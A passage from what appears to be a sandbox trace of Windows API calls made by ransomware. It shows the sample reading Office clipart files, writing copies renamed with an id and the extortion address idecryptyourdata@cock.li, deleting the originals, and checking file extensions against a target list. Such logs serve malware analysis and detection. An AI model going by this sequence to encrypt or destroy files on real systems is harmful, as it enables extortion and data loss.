lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.856] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0197.856] SetEndOfFile (hFile=0x340) returned 1 [0197.856] CloseHandle (hObject=0x340) returned 1 [0197.857] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.857] SetEndOfFile (hFile=0x37c) returned 1 [0197.858] CloseHandle (hObject=0x37c) returned 1 [0197.858] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182689.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.858] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182689.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182689.jpg")) returned 1 [0197.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182689.JPG") returned 68 [0197.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182689.JPG") returned 68 [0197.859] lstrlenW (lpString=".doc") returned 4 [0197.859] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0197.859] lstrlenW (lpString=".docx") returned 5 [0197.859] lstrcmpiW (lpString1=".docx", lpString2="9.JPG") returned -1 [0197.859] lstrlenW (lpString=".pdf") returned 4 [0197.859] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0197.859] lstrlenW (lpString=".xls") returned 4 [0197.859] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0197.859] lstrlenW (lpString=".xlsx") returned 5 [0197.859] lstrcmpiW (lpString1=".xlsx", lpString2="9.JPG") returned -1 [0197.859] lstrlenW (lpString=".ppt") returned 4 [0197.859] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0197.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182689.JPG") returned 68 [0197.859] lstrlenW (lpString=".zip") returned 4 [0197.859] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0197.859] lstrlenW (lpString=".rar") returned 4 [0197.859] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0197.859] lstrlenW (lpString=".bz2") returned 4 [0197.859] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0197.859] lstrlenW (lpString=".7z") returned 3 [0197.860] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0197.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182689.JPG") returned 68 [0197.860] lstrlenW (lpString=".dbf") returned 4 [0197.860] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0197.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182689.JPG") returned 68 [0197.860] lstrlenW (lpString=".1cd") returned 4 [0197.860] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0197.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182689.JPG") returned 68 [0197.860] lstrlenW (lpString=".jpg") returned 4 [0197.860] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0197.860] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.860] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.861] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182888.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182888.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0197.861] GetLastError () returned 0x0 [0197.861] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x5f48, lpOverlapped=0x0) returned 1 [0198.158] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x5f50, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x5f50, lpOverlapped=0x0) returned 1 [0198.160] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.160] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0198.160] SetEndOfFile (hFile=0x340) returned 1 [0198.160] CloseHandle (hObject=0x340) returned 1 [0198.160] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.160] SetEndOfFile (hFile=0x37c) returned 1 [0198.161] CloseHandle (hObject=0x37c) returned 1 [0198.161] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182888.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.162] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182888.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182888.wmf")) returned 1 [0198.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182888.WMF") returned 68 [0198.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182888.WMF") returned 68 [0198.162] lstrlenW (lpString=".doc") returned 4 [0198.162] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.162] lstrlenW (lpString=".docx") returned 5 [0198.163] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0198.163] lstrlenW (lpString=".pdf") returned 4 [0198.163] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.163] lstrlenW (lpString=".xls") returned 4 [0198.163] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.163] lstrlenW (lpString=".xlsx") returned 5 [0198.163] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0198.163] lstrlenW (lpString=".ppt") returned 4 [0198.163] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182888.WMF") returned 68 [0198.163] lstrlenW (lpString=".zip") returned 4 [0198.163] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.163] lstrlenW (lpString=".rar") returned 4 [0198.163] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.163] lstrlenW (lpString=".bz2") returned 4 [0198.163] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.163] lstrlenW (lpString=".7z") returned 3 [0198.163] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182888.WMF") returned 68 [0198.163] lstrlenW (lpString=".dbf") returned 4 [0198.163] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182888.WMF") returned 68 [0198.163] lstrlenW (lpString=".1cd") returned 4 [0198.163] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182888.WMF") returned 68 [0198.163] lstrlenW (lpString=".jpg") returned 4 [0198.163] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.164] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.164] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.164] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185790.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185790.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0198.164] GetLastError () returned 0x0 [0198.164] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x50b6, lpOverlapped=0x0) returned 1 [0198.167] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x50c0, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x50c0, lpOverlapped=0x0) returned 1 [0198.168] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.168] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0198.168] SetEndOfFile (hFile=0x340) returned 1 [0198.168] CloseHandle (hObject=0x340) returned 1 [0198.168] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.168] SetEndOfFile (hFile=0x37c) returned 1 [0198.169] CloseHandle (hObject=0x37c) returned 1 [0198.169] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185790.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.170] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185790.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185790.wmf")) returned 1 [0198.170] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185790.WMF") returned 68 [0198.170] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185790.WMF") returned 68 [0198.170] lstrlenW (lpString=".doc") returned 4 [0198.170] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.171] lstrlenW (lpString=".docx") returned 5 [0198.171] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0198.171] lstrlenW (lpString=".pdf") returned 4 [0198.171] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.171] lstrlenW (lpString=".xls") returned 4 [0198.171] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.171] lstrlenW (lpString=".xlsx") returned 5 [0198.171] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0198.171] lstrlenW (lpString=".ppt") returned 4 [0198.171] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185790.WMF") returned 68 [0198.171] lstrlenW (lpString=".zip") returned 4 [0198.171] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.171] lstrlenW (lpString=".rar") returned 4 [0198.171] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.171] lstrlenW (lpString=".bz2") returned 4 [0198.171] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.171] lstrlenW (lpString=".7z") returned 3 [0198.171] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185790.WMF") returned 68 [0198.171] lstrlenW (lpString=".dbf") returned 4 [0198.171] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185790.WMF") returned 68 [0198.171] lstrlenW (lpString=".1cd") returned 4 [0198.171] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185790.WMF") returned 68 [0198.171] lstrlenW (lpString=".jpg") returned 4 [0198.171] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.172] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.172] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.172] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185796.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185796.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0198.173] GetLastError () returned 0x0 [0198.173] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x650c, lpOverlapped=0x0) returned 1 [0198.175] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x6510, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x6510, lpOverlapped=0x0) returned 1 [0198.179] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.179] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0198.180] SetEndOfFile (hFile=0x340) returned 1 [0198.180] CloseHandle (hObject=0x340) returned 1 [0198.180] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.180] SetEndOfFile (hFile=0x37c) returned 1 [0198.181] CloseHandle (hObject=0x37c) returned 1 [0198.181] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185796.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.181] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185796.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185796.wmf")) returned 1 [0198.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185796.WMF") returned 68 [0198.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185796.WMF") returned 68 [0198.182] lstrlenW (lpString=".doc") returned 4 [0198.182] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.182] lstrlenW (lpString=".docx") returned 5 [0198.182] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0198.182] lstrlenW (lpString=".pdf") returned 4 [0198.182] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.182] lstrlenW (lpString=".xls") returned 4 [0198.182] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.182] lstrlenW (lpString=".xlsx") returned 5 [0198.182] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0198.182] lstrlenW (lpString=".ppt") returned 4 [0198.182] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185796.WMF") returned 68 [0198.183] lstrlenW (lpString=".zip") returned 4 [0198.183] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.183] lstrlenW (lpString=".rar") returned 4 [0198.183] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.183] lstrlenW (lpString=".bz2") returned 4 [0198.183] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.183] lstrlenW (lpString=".7z") returned 3 [0198.183] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185796.WMF") returned 68 [0198.183] lstrlenW (lpString=".dbf") returned 4 [0198.183] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185796.WMF") returned 68 [0198.183] lstrlenW (lpString=".1cd") returned 4 [0198.183] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185796.WMF") returned 68 [0198.183] lstrlenW (lpString=".jpg") returned 4 [0198.183] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.183] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.184] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.184] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185798.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185798.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0198.184] GetLastError () returned 0x0 [0198.184] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x8420, lpOverlapped=0x0) returned 1 [0198.189] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x8430, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x8430, lpOverlapped=0x0) returned 1 [0198.191] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.191] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0198.191] SetEndOfFile (hFile=0x340) returned 1 [0198.191] CloseHandle (hObject=0x340) returned 1 [0198.191] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.191] SetEndOfFile (hFile=0x37c) returned 1 [0198.193] CloseHandle (hObject=0x37c) returned 1 [0198.193] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185798.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.193] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185798.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185798.wmf")) returned 1 [0198.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185798.WMF") returned 68 [0198.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185798.WMF") returned 68 [0198.194] lstrlenW (lpString=".doc") returned 4 [0198.194] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.194] lstrlenW (lpString=".docx") returned 5 [0198.194] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0198.194] lstrlenW (lpString=".pdf") returned 4 [0198.194] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.194] lstrlenW (lpString=".xls") returned 4 [0198.194] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.194] lstrlenW (lpString=".xlsx") returned 5 [0198.194] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0198.194] lstrlenW (lpString=".ppt") returned 4 [0198.194] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185798.WMF") returned 68 [0198.194] lstrlenW (lpString=".zip") returned 4 [0198.194] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.194] lstrlenW (lpString=".rar") returned 4 [0198.194] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.194] lstrlenW (lpString=".bz2") returned 4 [0198.194] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.194] lstrlenW (lpString=".7z") returned 3 [0198.194] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185798.WMF") returned 68 [0198.195] lstrlenW (lpString=".dbf") returned 4 [0198.195] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185798.WMF") returned 68 [0198.195] lstrlenW (lpString=".1cd") returned 4 [0198.195] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185798.WMF") returned 68 [0198.195] lstrlenW (lpString=".jpg") returned 4 [0198.195] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.195] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.195] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.195] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185800.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185800.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0198.196] GetLastError () returned 0x0 [0198.196] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x5eae, lpOverlapped=0x0) returned 1 [0198.586] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x5eb0, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x5eb0, lpOverlapped=0x0) returned 1 [0198.587] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.588] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0198.588] SetEndOfFile (hFile=0x340) returned 1 [0198.588] CloseHandle (hObject=0x340) returned 1 [0198.588] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.588] SetEndOfFile (hFile=0x37c) returned 1 [0198.589] CloseHandle (hObject=0x37c) returned 1 [0198.589] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185800.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.589] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185800.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185800.wmf")) returned 1 [0198.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185800.WMF") returned 68 [0198.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185800.WMF") returned 68 [0198.590] lstrlenW (lpString=".doc") returned 4 [0198.590] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.590] lstrlenW (lpString=".docx") returned 5 [0198.590] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0198.590] lstrlenW (lpString=".pdf") returned 4 [0198.590] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.590] lstrlenW (lpString=".xls") returned 4 [0198.590] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.590] lstrlenW (lpString=".xlsx") returned 5 [0198.590] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0198.590] lstrlenW (lpString=".ppt") returned 4 [0198.590] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.590] lstrlenW 